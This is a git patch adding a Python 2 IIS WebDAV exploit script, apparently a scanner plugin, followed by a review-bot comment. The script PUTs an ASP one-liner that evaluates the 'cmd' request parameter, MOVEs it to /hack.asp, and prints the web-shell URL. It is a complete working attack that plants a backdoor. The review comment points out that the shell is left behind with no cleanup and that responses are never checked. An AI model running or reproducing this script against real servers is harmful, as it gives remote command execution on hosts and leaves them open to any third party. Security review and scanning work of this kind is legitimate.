From a2ab65e7576db522cac9d10ec58f3588d445ac43 Mon Sep 17 00:00:00 2001
From: 0c0c0f <892850447@qq.com>
Date: Wed, 15 Feb 2017 12:30:25 +0800
Subject: [PATCH] Create IIS_Put_File.py https://gist.github.com/lijiejie/3eb6c4a1db9b3fe3c59a
---
service/IIS_Put_File.py | 36 ++++++++++++++++++++++++++++++++++++
1 file changed, 36 insertions(+)
create mode 100644 service/IIS_Put_File.py
diff --git a/service/IIS_Put_File.py b/service/IIS_Put_File.py
new file mode 100644
index 0000000..38c2d2e
--- /dev/null
+++ b/service/IIS_Put_File.py
@@ -0,0 +1,36 @@
+#-*- encoding:utf-8 -*-
+
+'''
+IIS put file From http://www.lijiejie.com
+
+Usage:
+ iisPUT.py www.example.com:8080
+'''
+
+import httplib
+import sys
+
+try:
+ conn = httplib.HTTPConnection(sys.argv[1])
+ conn.request(method='OPTIONS', url='/')
+ headers = dict(conn.getresponse().getheaders())
+ if headers.get('server', '').find('Microsoft-IIS') < 0:
+ print 'This is not an IIS web server'
+
+ if 'public' in headers and \
+ headers['public'].find('PUT') > 0 and \
+ headers['public'].find('MOVE') > 0:
+ conn.close()
+ conn = httplib.HTTPConnection(sys.argv[1])
+ # PUT hack.txt
+ conn.request( method='PUT', url='/hack.txt', body='<%execute(request("cmd"))%>' )
+ conn.close()
+ conn = httplib.HTTPConnection(sys.argv[1])
+ # mv hack.txt to hack.asp
+ conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})
+ print 'ASP webshell:', 'http://' + sys.argv[1] + '/hack.asp'
+ else:
+ print 'Server not vulnerable'
+
+except Exception,e:
+ print 'Error:', e
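Review bot: The PUT/MOVE branch prints 'ASP webshell:' without reading either response, so the plugin records a finding even when the server refused the request, and it leaves a command-evaluating `/hack.asp` at a fixed path on the assessed host with no cleanup, where any third party can reach it. For a scanner check an inert text body is enough to show the write-enabled WebDAV misconfiguration; read each reply with `resp = conn.getresponse()`, report only when `resp.status` is in the 2xx range, and remove the test file afterwards. The 'This is not an IIS web server' branch also does not appear to stop the run (indentation is lost in this view), so non-IIS hosts would still reach the write test. Hosts that genuinely pass this check need WebDAV write access disabled on the site.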